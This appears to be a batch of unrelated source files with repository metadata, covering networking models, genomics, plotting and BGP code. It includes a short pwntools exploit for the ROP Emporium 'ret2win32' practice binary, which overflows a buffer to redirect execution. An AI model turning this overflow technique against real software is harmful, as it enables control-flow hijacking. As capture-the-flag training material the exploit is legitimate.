prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("startTs", prop) prop = PropMeta("str", "startTx", "startTx", 36895, PropCategory.REGULAR) prop.label = "startTxId" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "none" prop._addConstant("none", "none", 0) meta.props.add("startTx", prop) prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("created", "created", 2) prop._addConstant("deleted", "deleted", 8) prop._addConstant("modified", "modified", 4) meta.props.add("status", prop) prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR) prop.label = "Try" prop.isImplicit = True prop.isAdmin = True meta.props.add("try", prop) prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("ts", prop) meta.namingProps.append(getattr(meta.props, "id")) def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps): namingVals = [id] Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps) # End of package file # ##################################################
[ "bkhoward@live.com" ]
bkhoward@live.com
9f6345850132d48dabb1e26044ea02ea449056c4
4c9a5f1b44ad6fa84a984b8164414c99aba7f391
/pepper/modules/python/Stitch.py
0734eb61c124c59b09ff199496d23bcc7754cb4f
[ "MIT" ]
permissive
kishwarshafin/pepper
20760a2a820d77ca5fc798957f0de658e936dcca
30c8907501b254bb72d8f64dfb8cf54a1b7a60eb
refs/heads/r0.8
2023-08-04T07:03:53.564606
2022-07-08T18:22:01
2022-07-08T18:22:01
185,895,043
219
41
MIT
2023-07-22T05:17:46
2019-05-10T01:13:11
Python
UTF-8
Python
false
false
5,521
py
import h5py import sys from os.path import isfile, join from os import listdir import concurrent.futures import numpy as np from collections import defaultdict import operator from pepper.modules.python.Options import ImageSizeOptions from datetime import datetime label_decoder = {1: 'A', 2: 'C', 3: 'G', 4: 'T', 0: ''} MIN_SEQUENCE_REQUIRED_FOR_MULTITHREADING = 2 def get_file_paths_from_directory(directory_path): """ Returns all paths of files given a directory path :param directory_path: Path to the directory :return: A list of paths of files """ file_paths = [join(directory_path, file) for file in listdir(directory_path) if isfile(join(directory_path, file)) and file[-2:] == 'h5'] return file_paths def chunks(file_names, threads): """Yield successive n-sized chunks from l.""" chunks = [] for i in range(0, len(file_names), threads): chunks.append(file_names[i:i + threads]) return chunks def small_chunk_stitch(contig, small_chunk_keys): # for chunk_key in small_chunk_keys: base_prediction_dictionary = defaultdict() # phred_score_dictionary = defaultdict() all_positions = set() # ignore first 2 * MIN_IMAGE_OVERLAP bases as they are just overlaps buffer_positions = ImageSizeOptions.MIN_IMAGE_OVERLAP * 2 for file_name, contig_name, _st, _end in small_chunk_keys: chunk_name = contig_name + '-' + str(_st) + '-' + str(_end) with h5py.File(file_name, 'r') as hdf5_file: smaller_chunks = set(hdf5_file['predictions'][contig][chunk_name].keys()) - {'contig_start', 'contig_end'} smaller_chunks = sorted(smaller_chunks) for i, chunk in enumerate(smaller_chunks): with h5py.File(file_name, 'r') as hdf5_file: bases = hdf5_file['predictions'][contig][chunk_name][chunk]['bases'][()] # phred_score = hdf5_file['predictions'][contig][chunk_name][chunk]['phred_score'][()] positions = hdf5_file['predictions'][contig][chunk_name][chunk]['position'][()] indices = hdf5_file['predictions'][contig][chunk_name][chunk]['index'][()] positions = np.array(positions, dtype=np.int64) base_predictions 
= np.array(bases, dtype=np.int) # if _st == 107900: # print(positions) for pos, indx, base_pred in zip(positions, indices, base_predictions): # not take the first buffer bases for every chunk that has an overlap to the last chunk if _st > 0 and pos <= _st + buffer_positions: continue if indx < 0 or pos < 0: continue base_prediction_dictionary[(pos, indx)] = base_pred # phred_score_dictionary[(pos, indx)] = base_score + 33 all_positions.add((pos, indx)) if len(all_positions) == 0: return -1, -1, '' pos_list = sorted(list(all_positions), key=lambda element: (element[0], element[1])) dict_fetch = operator.itemgetter(*pos_list) # weird but python has no casting between np.int64 to list if len(pos_list) > 1: predicted_base_labels = list(dict_fetch(base_prediction_dictionary)) # predicted_phred_scores = list(dict_fetch(phred_score_dictionary)) else: predicted_base_labels = [dict_fetch(base_prediction_dictionary)] # predicted_phred_scores = [dict_fetch(phred_score_dictionary)] sequence = ''.join([label_decoder[base] for base in predicted_base_labels]) # phred_score = ''.join([chr(phred_score) for base, phred_score in zip(predicted_base_labels, predicted_phred_scores) if base != 0]) first_pos = pos_list[0][0] last_pos = pos_list[-1][0] return first_pos, last_pos, sequence def create_consensus_sequence(contig, sequence_chunk_keys, threads): sequence_chunk_keys = sorted(sequence_chunk_keys, key=lambda element: (element[1])) sequence_chunk_key_list = list() for file_name, sequence_chunk_key, contig_start, contig_end in sequence_chunk_keys: sequence_chunk_key_list.append((file_name, contig, int(contig_start), int(contig_end))) sequence_chunk_key_list = sorted(sequence_chunk_key_list, key=lambda element: (element[2], element[3])) sequence_chunks = list() # generate the dictionary in parallel with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor: file_chunks = chunks(sequence_chunk_key_list, max(MIN_SEQUENCE_REQUIRED_FOR_MULTITHREADING, 
int(len(sequence_chunk_key_list) / threads) + 1)) futures = [executor.submit(small_chunk_stitch, contig, chunk) for chunk in file_chunks] for fut in concurrent.futures.as_completed(futures): if fut.exception() is None: first_pos, last_pos, sequence = fut.result() if first_pos != -1 and last_pos != -1: sequence_chunks.append((first_pos, last_pos, sequence)) else: sys.stderr.write("[" + str(datetime.now().strftime('%m-%d-%Y %H:%M:%S')) + "] ERROR: " + str(fut.exception()) + "\n") fut._result = None # python issue 27144 sequence_chunks = sorted(sequence_chunks, key=lambda element: (element[0], element[1])) stitched_sequence = '' for first_pos, last_pos, sequence in sequence_chunks: stitched_sequence = stitched_sequence + sequence return stitched_sequence
[ "kishwar.shafin@gmail.com" ]
kishwar.shafin@gmail.com
6557d0f91c736194fd7b901916bf5c217d93a5c8
e2f20ded13f4877248b2db7d5251c701bc586745
/hggStyle.py
b743da4cb04a28f2693918482b6b945763ab6a92
[]
no_license
flashgg-validation/plotZeeValidation
965f1c8c8dd5aa5e7250abad04add18a48955ee8
0c845060d7498ce92780839ec2da46515145abf3
refs/heads/master
2021-01-17T07:52:56.292151
2017-02-13T15:18:21
2017-02-13T15:18:21
60,186,146
0
2
null
2016-06-03T15:03:54
2016-06-01T14:53:36
Python
UTF-8
Python
false
false
1,451
py
import ROOT def hggStyle(): hggStyle = ROOT.TStyle("hggPaperStyle","Hgg Paper Style") hggStyle.SetFrameFillColor(0) hggStyle.SetStatColor(0) hggStyle.SetOptStat(0) hggStyle.SetTitleFillColor(0) hggStyle.SetCanvasBorderMode(0) hggStyle.SetPadBorderMode(0) hggStyle.SetFrameBorderMode(0) hggStyle.SetPadColor(ROOT.kWhite) hggStyle.SetCanvasColor(ROOT.kWhite) hggStyle.SetCanvasDefH(600) #Height of canvas hggStyle.SetCanvasDefW(600) #Width of canvas hggStyle.SetCanvasDefX(0) #POsition on screen hggStyle.SetCanvasDefY(0) hggStyle.SetPadLeftMargin(0.13)#0.16) hggStyle.SetPadRightMargin(0.1)#0.02) hggStyle.SetPadTopMargin(0.085)#0.02) hggStyle.SetPadBottomMargin(0.12)#0.02) # For hgg axis titles: hggStyle.SetTitleColor(1, "XYZ") hggStyle.SetTitleFont(42, "XYZ") hggStyle.SetTitleSize(0.05, "XYZ") hggStyle.SetTitleXOffset(0.95)#0.9) hggStyle.SetTitleYOffset(1.15) # => 1.15 if exponents # For hgg axis labels: hggStyle.SetLabelColor(1, "XYZ") hggStyle.SetLabelFont(42, "XYZ") hggStyle.SetLabelOffset(0.007, "XYZ") hggStyle.SetLabelSize(0.04, "XYZ") # Legends hggStyle.SetLegendBorderSize(0) hggStyle.SetLegendFillColor(ROOT.kWhite) hggStyle.SetLegendFont(42) hggStyle.SetFillColor(10) # Nothing for now hggStyle.SetTextFont(42) hggStyle.SetTextSize(0.03) hggStyle.cd()
[ "matteosan1@gmail.com" ]
matteosan1@gmail.com
868f76281959f6253538cf380f9a2a1802982d27
80bbc5a4a5ebbf1be75afc8cd0102dcd60a6a081
/huaula/github.py
3aa2e1ee9344de60626d53cb4631a59a37e5ffcd
[ "MIT" ]
permissive
renzon/hu
642dc6bac9501eaee99623108d4c5c0aa04a1c52
4147f38e138e73db54cd9a81812795e793bdb921
refs/heads/master
2021-01-01T05:01:03.889460
2016-05-13T20:55:08
2016-05-13T20:55:08
58,227,578
2
1
MIT
2019-10-22T18:03:47
2016-05-06T18:38:25
Python
UTF-8
Python
false
false
501
py
import json from os import path import requests diretorio_dese_arquivo = path.dirname(__file__) diretorio_huaula = path.join(diretorio_dese_arquivo, '..') diretorio_do_projeto = path.abspath(diretorio_huaula) import sys sys.path.append(diretorio_do_projeto) from huaula import dunder_main def buscar_avatar(nome): r = requests.get('https://api.github.com/users/{}'.format(nome),) dados = json.loads(r.text) dunder_main.b return dados['avatar_url'] print(buscar_avatar('renzon'))
[ "renzon@gmail.com" ]
renzon@gmail.com
9e677bece07b63a388f96d5c6dd85353008dfab7
531c5c6fab45a69c36b716196c713fa1b67cc88f
/0x00_ret2win/32-bit/exploit.py
11229c37cbfd158ba3eb985b9b7c4fcab0a002ed
[]
no_license
youngkao/ROP_Emporium
b79a06bb97db9fc3d156c064a84f35e585493fa5
d4ca8b99bf2960e2c867f3360c901e649a614f8c
refs/heads/master
2022-02-19T04:05:33.706883
2019-09-25T12:23:39
2019-09-25T12:23:39
null
0
0
null
null
null
null
UTF-8
Python
false
false
362
py
import sys; sys.path.append("../..") import shared_pwn from pwn import * BINARY_NAME = "ret2win32" BUFFER_LEN = 44 io = process(f"./{BINARY_NAME}") junk = b"\x90" * BUFFER_LEN # Pointers win_addr = p32(0x08048659) # Payload creation payload = b"" payload += junk payload += win_addr io.recvuntil("> ") io.send(payload) io.send("\n") shared_pwn._recvall(io)
[ "afray@protonmail.com" ]
afray@protonmail.com
c036217771fed754eb3e8ccbcefae4fe4921134a
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/adjectives/_variegated.py
066dd80491cf63f80a64cabdac0ff24abbe116a3
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
414
py
#calss header class _VARIEGATED(): def __init__(self,): self.name = "VARIEGATED" self.definitions = [u'having a pattern of different colours or marks: '] self.parents = [] self.childen = [] self.properties = [] self.jsondata = {} self.specie = 'adjectives' def run(self, obj1, obj2): self.jsondata[obj2] = {} self.jsondata[obj2]['properties'] = self.name.lower() return self.jsondata
[ "xingwang1991@gmail.com" ]
xingwang1991@gmail.com
1b0da8a0baa221478bc19fb0a1088a711ad3a254
6ea679ac5cdaf5e6f8d9584194ad74440762eea3
/lib/exabgp/bgp/message/open/capability/capability.py
7a6fccdf09ef4c9778a8b12e6ea3e2e5c7eff9fa
[]
no_license
h-naoto/exabgp
0d7b307d9e23e50a295bc70283141c58f9ef83f1
05a96e99c35256160df8923e7a17f57e3ca36e3d
refs/heads/master
2021-01-15T18:04:42.333066
2015-02-05T08:11:37
2015-02-05T08:11:37
30,223,499
0
0
null
2015-02-03T03:48:25
2015-02-03T03:48:25
null
UTF-8
Python
false
false
4,190
py
# encoding: utf-8 """ capability.py Created by Thomas Mangin on 2012-07-17. Copyright (c) 2009-2015 Exa Networks. All rights reserved. """ from exabgp.bgp.message.notification import Notify # =================================================================== Capability # class Capability (object): class CODE (int): __slots__ = [] RESERVED = 0x00 # [RFC5492] MULTIPROTOCOL = 0x01 # [RFC2858] ROUTE_REFRESH = 0x02 # [RFC2918] OUTBOUND_ROUTE_FILTERING = 0x03 # [RFC5291] MULTIPLE_ROUTES = 0x04 # [RFC3107] EXTENDED_NEXT_HOP = 0x05 # [RFC5549] # 6-63 Unassigned GRACEFUL_RESTART = 0x40 # [RFC4724] FOUR_BYTES_ASN = 0x41 # [RFC4893] # 66 Deprecated DYNAMIC_CAPABILITY = 0x43 # [Chen] MULTISESSION = 0x44 # [draft-ietf-idr-bgp-multisession] ADD_PATH = 0x45 # [draft-ietf-idr-add-paths] ENHANCED_ROUTE_REFRESH = 0x46 # [draft-ietf-idr-bgp-enhanced-route-refresh] OPERATIONAL = 0x47 # ExaBGP only ... # 70-127 Unassigned ROUTE_REFRESH_CISCO = 0x80 # I Can only find reference to this in the router logs # 128-255 Reserved for Private Use [RFC5492] MULTISESSION_CISCO = 0x83 # What Cisco really use for Multisession (yes this is a reserved range in prod !) 
EXTENDED_MESSAGE = -1 # No yet defined by draft http://tools.ietf.org/html/draft-ietf-idr-extended-messages-02.txt unassigned = range(70,128) reserved = range(128,256) # Internal AIGP = 0xFF00 names = { RESERVED: 'reserved', MULTIPROTOCOL: 'multiprotocol', ROUTE_REFRESH: 'route-refresh', OUTBOUND_ROUTE_FILTERING: 'outbound-route-filtering', MULTIPLE_ROUTES: 'multiple-routes', EXTENDED_NEXT_HOP: 'extended-next-hop', GRACEFUL_RESTART: 'graceful-restart', FOUR_BYTES_ASN: 'asn4', DYNAMIC_CAPABILITY: 'dynamic-capability', MULTISESSION: 'multi-session', ADD_PATH: 'add-path', ENHANCED_ROUTE_REFRESH: 'enhanced-route-refresh', OPERATIONAL: 'operational', ROUTE_REFRESH_CISCO: 'cisco-route-refresh', MULTISESSION_CISCO: 'cisco-multi-sesion', AIGP: 'aigp', } def __str__ (self): name = self.names.get(self,None) if name is None: if self in Capability.CODE.unassigned: return 'unassigned-%s' % hex(self) if self in Capability.CODE.reserved: return 'reserved-%s' % hex(self) return 'capability-%s' % hex(self) return name def __repr__ (self): return str(self) @classmethod def name (cls,self): name = cls.names.get(self,None) if name is None: if self in Capability.CODE.unassigned: return 'unassigned-%s' % hex(self) if self in Capability.CODE.reserved: return 'reserved-%s' % hex(self) return name registered_capability = dict() _fallback_capability = None @staticmethod def hex (data): return '0x' + ''.join('%02x' % ord(_) for _ in data) @classmethod def fallback_capability (cls, imp): if cls._fallback_capability is not None: raise RuntimeError('only one fallback function can be registered') cls._fallback_capability = imp @staticmethod def register_capability (klass,capability=None): # ID is defined by all the subclasses - otherwise they do not work :) what = klass.ID if capability is None else capability # pylint: disable=E1101 if what in klass.registered_capability: raise RuntimeError('only one class can be registered per capability') klass.registered_capability[what] = klass @classmethod 
def klass (cls,what): if what in cls.registered_capability: kls = cls.registered_capability[what] kls.ID = what return kls if cls._fallback_capability: return cls._fallback_capability raise Notify (2,4,'can not handle capability %s' % what) @classmethod def unpack (cls,capability,capabilities,data): instance = capabilities.get(capability,Capability.klass(capability)()) return cls.klass(capability).unpack_capability(instance,data,capability)
[ "thomas.mangin@exa-networks.co.uk" ]
thomas.mangin@exa-networks.co.uk
2afaad96ff00e3e3de0b221b11e2f3db5bd578bf
d1f971b9fa0edfa633b62887cf9d173d6a86a440
/data_structures_and_algorithms/exercises/Recursions/sum_digits_iterative.py
d6529b86b2ccb00c3aef778d5028fdab5cc12eec
[]
no_license
papan36125/python_exercises
d45cf434c15aa46e10967c13fbe9658915826478
748eed2b19bccf4b5c700075675de87c7c70c46e
refs/heads/master
2020-04-28T10:01:10.361108
2019-05-10T13:45:35
2019-05-10T13:45:35
175,187,760
0
0
null
null
null
null
UTF-8
Python
false
false
288
py
# Linear - O(N) def sum_digits(n): if n < 0: ValueError("Inputs 0 or greater only!") result = 0 while n is not 0: result += n % 10 n = n // 10 return result + n sum_digits(12) # 1 + 2 # 3 sum_digits(552) # 5 + 5 + 2 # 12 sum_digits(123456789) # 1 + 2 + 3 + 4... # 45
[ "noreply@github.com" ]
papan36125.noreply@github.com
80bbc6e2f6bcd9d7b41013d8b2c550e98e0920ed
da853ef2c9946344ae34829355a507052f1af411
/PycharmProjects/tuples.py
cf7ab20f7eeaa1f522356d52123c7c22e400e309
[]
no_license
SubhamSingh1/star
c4f3d2ac0470e81847fef4436c0cbd3e1ea9bf6c
33531c1f224e0a553d93d877724db673bf6941db
refs/heads/master
2022-12-21T13:27:03.969571
2021-10-01T07:31:17
2021-10-01T07:31:17
235,774,208
0
0
null
2022-12-14T11:40:12
2020-01-23T10:43:20
Python
UTF-8
Python
false
false
57
py
tuple1 = (1,2,3,4,5) print(tuple1[-1]) print(tuple1[-4])
[ "60218236+SubhamSingh1@users.noreply.github.com" ]
60218236+SubhamSingh1@users.noreply.github.com
51278c6c7c276bdac6699685e2380d14239b4a52
52b5773617a1b972a905de4d692540d26ff74926
/.history/binaryTree2_20200617161602.py
904a5a72342f25c5640e14213b27638d3386851d
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,105
py
# Create a node and assign a value to the node # A tree node contains data then pointer to left child and pointer to right child class Node: def __init__(self,data): # designate one node as root self.data = data # then the two others as child nodes self.left = None self.right = None def inorder(root,newArr): if root: # Traverse left inorder(root.left,newArr) newArr.append(root.data) inorder(root.right,newArr) print(newArr) return newArr def morris_traversal(root): # function for iterative inorder tree traversal current = root while current is not None: # do the following if current.left is None: yield current.data else: # find the current in order predecessor of current pre = current.left while pre.right is not None root = Node(1) root.left = Node(2) root.right = Node(3) root.left.right = Node(4) root.left.left = Node(7) print(inorder(root,[]))
[ "mary.jereh@gmail.com" ]
mary.jereh@gmail.com
a7b54272021537b38792b78c662b99775170cab6
24fe1f54fee3a3df952ca26cce839cc18124357a
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqpt/ingrerrpktshist.py
dbdeaffa4a8787bcd1449adb1fd085f6c88d4156
[]
no_license
aperiyed/servicegraph-cloudcenter
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
9eb7975f2f6835e1c0528563a771526896306392
refs/heads/master
2023-05-10T17:27:18.022381
2020-01-20T09:18:28
2020-01-20T09:18:28
235,065,676
0
0
null
2023-05-01T21:19:14
2020-01-20T09:36:37
Python
UTF-8
Python
false
false
24,286
py
# coding=UTF-8 # ********************************************************************** # Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved # written by zen warriors, do not modify! # ********************************************************************** from cobra.mit.meta import ClassMeta from cobra.mit.meta import StatsClassMeta from cobra.mit.meta import CounterMeta from cobra.mit.meta import PropMeta from cobra.mit.meta import Category from cobra.mit.meta import SourceRelationMeta from cobra.mit.meta import NamedSourceRelationMeta from cobra.mit.meta import TargetRelationMeta from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory from cobra.model.category import MoCategory, PropCategory, CounterCategory from cobra.mit.mo import Mo # ################################################## class IngrErrPktsHist(Mo): meta = StatsClassMeta("cobra.model.eqpt.IngrErrPktsHist", "Ingress Error Packets") counter = CounterMeta("crcCountRate", CounterCategory.GAUGE, "packets-per-second", "CRC Align Errored Packets rate") counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcCountRateMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcCountRateMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcCountRateAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcCountRateSpct" counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcCountRateThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcCountRateTr" meta._counters.append(counter) counter = CounterMeta("crcCount", CounterCategory.COUNTER, "packets", "CRC Align Errored Packets") counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "crcCountCum" counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "crcCountPer" counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcCountMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcCountMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcCountAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcCountSpct" 
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcCountThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcCountTr" counter._propRefs[PropCategory.IMPLICIT_RATE] = "crcCountRate" meta._counters.append(counter) counter = CounterMeta("crc", CounterCategory.GAUGE, "percentage", "CRC Align Errors") counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcSpct" counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcTr" meta._counters.append(counter) meta.isAbstract = True meta.moClassName = "eqptIngrErrPktsHist" meta.moClassName = "eqptIngrErrPktsHist" meta.rnFormat = "" meta.category = MoCategory.STATS_HISTORY meta.label = "historical Ingress Error Packets stats" meta.writeAccessMask = 0x1 meta.readAccessMask = 0x1 meta.isDomainable = False meta.isReadOnly = True meta.isConfigurable = False meta.isDeletable = False meta.isContextRoot = False meta.superClasses.add("cobra.model.stats.Item") meta.superClasses.add("cobra.model.stats.Hist") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1mo") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1w") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1qtr") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist15min") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist5min") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1year") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1d") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1h") meta.rnPrefixes = [ ] prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("deleteAll", "deleteall", 16384) prop._addConstant("deleteNonPresent", 
"deletenonpresent", 8192) prop._addConstant("ignore", "ignore", 4096) meta.props.add("childAction", prop) prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR) prop.label = "Number of Collections During this Interval" prop.isImplicit = True prop.isAdmin = True meta.props.add("cnt", prop) prop = PropMeta("str", "crcAvg", "crcAvg", 43586, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errors average value" prop.isOper = True prop.isStats = True meta.props.add("crcAvg", prop) prop = PropMeta("str", "crcCountAvg", "crcCountAvg", 45230, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errored Packets average value" prop.isOper = True prop.isStats = True meta.props.add("crcCountAvg", prop) prop = PropMeta("str", "crcCountCum", "crcCountCum", 45226, PropCategory.IMPLICIT_CUMULATIVE) prop.label = "CRC Align Errored Packets cumulative" prop.isOper = True prop.isStats = True meta.props.add("crcCountCum", prop) prop = PropMeta("str", "crcCountMax", "crcCountMax", 45229, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errored Packets maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountMax", prop) prop = PropMeta("str", "crcCountMin", "crcCountMin", 45228, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errored Packets minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountMin", prop) prop = PropMeta("str", "crcCountPer", "crcCountPer", 45227, PropCategory.IMPLICIT_PERIODIC) prop.label = "CRC Align Errored Packets periodic" prop.isOper = True prop.isStats = True meta.props.add("crcCountPer", prop) prop = PropMeta("str", "crcCountRate", "crcCountRate", 45234, PropCategory.IMPLICIT_RATE) prop.label = "CRC Align Errored Packets rate" prop.isOper = True prop.isStats = True meta.props.add("crcCountRate", prop) prop = PropMeta("str", "crcCountRateAvg", "crcCountRateAvg", 45246, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errored Packets rate average value" prop.isOper = True prop.isStats = True 
meta.props.add("crcCountRateAvg", prop) prop = PropMeta("str", "crcCountRateMax", "crcCountRateMax", 45245, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errored Packets rate maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateMax", prop) prop = PropMeta("str", "crcCountRateMin", "crcCountRateMin", 45244, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errored Packets rate minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateMin", prop) prop = PropMeta("str", "crcCountRateSpct", "crcCountRateSpct", 45247, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errored Packets rate suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateSpct", prop) prop = PropMeta("str", "crcCountRateThr", "crcCountRateThr", 45248, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errored Packets rate thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", 
"cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", 
"rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcCountRateThr", prop) prop = PropMeta("str", "crcCountRateTr", "crcCountRateTr", 45249, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errored Packets rate trend" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateTr", prop) prop = PropMeta("str", "crcCountSpct", "crcCountSpct", 45231, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errored Packets suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcCountSpct", prop) prop = PropMeta("str", "crcCountThr", "crcCountThr", 45232, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errored Packets thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 
